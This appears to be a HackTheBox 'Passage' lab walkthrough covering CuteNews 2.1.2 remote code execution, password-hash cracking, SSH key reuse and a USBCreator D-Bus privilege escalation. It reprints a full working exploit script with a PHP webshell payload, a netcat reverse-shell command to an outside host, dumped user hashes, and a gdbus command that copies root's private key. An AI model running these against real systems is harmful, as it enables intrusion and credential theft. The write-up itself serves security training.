HackTheBox “Passage” Walkthrough
Passage, a medium-level Linux OS machine on HackTheBox, features a CuteNews web application susceptible to a remote command execution vulnerability. Exploiting this flaw provides initial access. After cracking a CuteNews password hash for the user paul, password reuse facilitates lateral movement to the paul system user. Discovery of a shared SSH key enables further lateral progression to the user nadav, a sudo group member. Examining the results of the linpeas bash script uncovers an edited com.ubuntu.USBCreator.conf policy, granting sudo group members access to usb-creator service methods. Exploiting a vulnerability in the D-Bus service USBCreator bypasses the password security policy, allowing privileged file access as root.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
Check port 80.
CuteNews, a PHP news management system, is utilized. Upon investigation, the login page for CuteNews CMS is identified at http://10.10.10.206/CuteNews.
The platform employs CuteNews 2.1.2, let’s searchsploit it.
A remote code execution vulnerability 48800 has been identified. Let’s delve into the details of the exploit.
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m 48800
Exploit: CuteNews 2.1.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/48800
Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
Codes: CVE-2019-11447
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48800.py
┌──(kali㉿kali)-[~/Desktop]
└─$ cat 48800.py
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447
#! /bin/env python3
import requests
from base64 import b64decode
import io
import re
import string
import random
import sys
banner = """
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")
def extract_credentials():
global sess, ip
url = f"{ip}/CuteNews/cdata/users/lines"
encoded_creds = sess.get(url).text
buff = io.StringIO(encoded_creds)
chash = buff.readlines()
if "Not Found" in encoded_creds:
print ("[-] No hashes were found skipping!!!")
return
else:
for line in chash:
if "<?php die('Direct call - access denied'); ?>" not in line:
credentials = b64decode(line)
try:
sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
print (sha_hash)
except:
pass
def register():
global sess, ip
userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
postdata = {
"action" : "register",
"regusername" : userpass,
"regnickname" : userpass,
"regpassword" : userpass,
"confirm" : userpass,
"regemail" : f"{@hack.me">userpass}@hack.me"
}
register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
if 302 == register.status_code:
print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
else:
sys.exit()
def send_payload(payload):
global ip
token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
print (f"signature_key: {signature_key}")
print (f"signature_dsi: {signature_dsi}")
print (f"logged in user: {logged_user}")
files = {
"mod" : (None, "main"),
"opt" : (None, "personal"),
"__signature_key" : (None, f"{signature_key}"),
"__signature_dsi" : (None, f"{signature_dsi}"),
"editpassword" : (None, ""),
"confirmpassword" : (None, ""),
"editnickname" : (None, logged_user),
"avatar_file" : (f"{logged_user}.php", payload),
"more[site]" : (None, ""),
"more[about]" : (None, "")
}
payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
print("============================\nDropping to a SHELL\n============================")
while True:
print ()
command = input("command > ")
postdata = {"cmd" : command}
output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
if 404 == output.status_code:
print ("sorry i can't find your webshell try running the exploit again")
sys.exit()
else:
output = re.sub("GIF8;", "", output.text)
print (output.strip())
if __name__ == "__main__":
print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
extract_credentials()
print ("================================================================")
print()
print ("=============================\nRegistering a users\n=============================")
register()
print()
print("=======================================================\nSending Payload\n=======================================================")
send_payload(payload)
print ()The provided Python script leverages a Remote Code Execution (RCE) vulnerability in CuteNews 2.1.2 (CVE-2019–11447). Its key actions include extracting user credentials, registering a new user with random credentials, and exploiting the RCE by uploading a PHP file as the user’s avatar. This results in the establishment of a command shell on the server, enabling the execution of arbitrary commands.
To execute the exploit, specify the URL of the vulnerable CuteNews application.
Run a listener to upgrade our shell:
Run a reverse shell command: nc -e /bin/sh 10.10.14.6 4343
Checking our listener.
Initiate a TTY shell and begin scanning the CMS directory.
We locate the “cdata” folder and observe a “users” subfolder while navigating inside.
In the ‘users’ folder, we review the PHP files.
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
05.php 21.php 52.php 6e.php 95.php c8.php f8.php
09.php 30.php 5d.php 77.php 97.php d4.php fc.php
0a.php 32.php 66.php 7a.php b0.php d5.php lines
16.php 4c.php 6a.php 8f.php bb.php d6.php users.txt
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat *.php
cat *.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTcwMDMxNzUyNztzOjEwOiJ2TWFYZldRa1prIjt9fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=<?php die('Direct call - access denied'); ?>
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IkhsRWJHaXVFRmxAaGFjay5tZSI7czoxMDoiSGxFYkdpdUVGbCI7fXM6MjoiaWQiO2E6MTp7aToxNzAwMzI4OTg5O3M6MTA6IkIzcmlWOE1SdXYiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODkxMDg5NjtzOjY6ImhhY2tlciI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoidk1hWGZXUWtaayI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzE3NTI3IjtzOjQ6Im5hbWUiO3M6MTA6InZNYVhmV1FrWmsiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6InZNYVhmV1FrWmtAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJ2TWFYZldRa1prIjtzOjQ6InBhc3MiO3M6NjQ6IjBkZGY1MTY0OTc2MDk2NzI5ZmQ5M2ZiYjE5MTBjMmRlM2YxMzBhZWY1MTViMGU1M2RjYzdmMjk3NmQyYTk2NzEiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX3ZNYVhmV1FrWmtfdk1hWGZXUWtaay5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiQjNyaVY4TVJ1diI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzI4OTg5IjtzOjQ6Im5hbWUiO3M6MTA6IkIzcmlWOE1SdXYiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IkIzcmlWOE1SdXZAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJCM3JpVjhNUnV2IjtzOjQ6InBhc3MiO3M6NjQ6IjZhZWE3MTAwNDVhNGViOWIyM2I1ZDYwNDI5ZmI0YzRjYmI2MDAyMTZlMWRmZTNmMjEzNDVhOTdmMTFlMDZjY2EiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX0IzcmlWOE1SdXZfQjNyaVY4TVJ1di5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX19<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==<?php die('Direct call - access denied'); ?>
YToyOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiSGxFYkdpdUVGbCI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzI3NjM0IjtzOjQ6Im5hbWUiO3M6MTA6IkhsRWJHaXVFRmwiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IkhsRWJHaXVFRmxAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJIbEViR2l1RUZsIjtzOjQ6InBhc3MiO3M6NjQ6IjdmZWZjZmEzOTk5OTRkNzU2ZWY0NjVmNDYxNmI3YmJhOTNlYjliNmM0YzgzZDEzZDljODQyMDQ1MTkxOWYzMTAiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX0hsRWJHaXVFRmxfSGxFYkdpdUVGbC5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX1zOjU6ImVtYWlsIjthOjE6e3M6MTg6IkIzcmlWOE1SdXZAaGFjay5tZSI7czoxMDoiQjNyaVY4TVJ1diI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6InZNYVhmV1FrWmtAaGFjay5tZSI7czoxMDoidk1hWGZXUWtaayI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6Mjp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg5MDY4ODEiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3lreG5hY3B0LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9czo2OiJoYWNrZXIiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg5MTA4OTYiO3M6NDoibmFtZSI7czo2OiJoYWNrZXIiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjQ6Im5pY2siO3M6NjoiaGFja2VyIjtzOjQ6InBhc3MiO3M6NjQ6ImU3ZDM2ODU3MTU5Mzk4NDI3NDljYzI3YjM4ZDBjY2I5NzA2ZDRkMTRhNTMwNGVmOWVlZTA5Mzc4MGVhYjVkZjkiO3M6MzoibHRzIjtzOjEwOiIxNTk4OTEwOTExIjtzOjM6ImJhbiI7czoxOiIwIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czo2OiJhdmF0YXIiO3M6MjY6ImF2YXRhcl9oYWNrZXJfanB5b3lza3QucGhwIjtzOjY6ImUtaGlkZSI7czowOiIiO319fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTcwMDMyNzYzNDtzOjEwOiJIbEViR2l1RUZsIjt9fQ==<?php die('Direct call - access denied'); ?>We decode the content using a Base64 decoder.
It appears to be serialized, with user-password hashes. Notably, the hash for the user “paul” is found in the screenshot above:
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
Let’s submit this hash to crackstation.net.
Switch to ‘paul’ user.
While navigating into the .ssh directory, we locate the id_rsa and id_rsa.pub files.
Let’s have a look at the id files.
We transfer the id_rsa to the our attack box.
We access the target machine as the user “nadav.”
Upon SSH login, we navigate to the temp folder, transfer the LinPEAS script, and execute it.
LinPEAS results revealed the target machine’s vulnerability to the USBCreator D-Bus Exploit.
We researched this exploit to determine its potential for elevating privileges on the target machine.
The USBCreator D-Bus interface vulnerability enables a user in the sudoers group to bypass sudo’s password security policy. Exploiting this flaw allows an attacker to overwrite/read arbitrary files with root privileges, leading to elevated access. Utilizing gdbus, the attacker can exploit USBCreator to read the root user’s id_rsa file and copy its contents to a text file.
Exploit command:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_root true
We utilize the generated key for direct SSH login from the target machine.
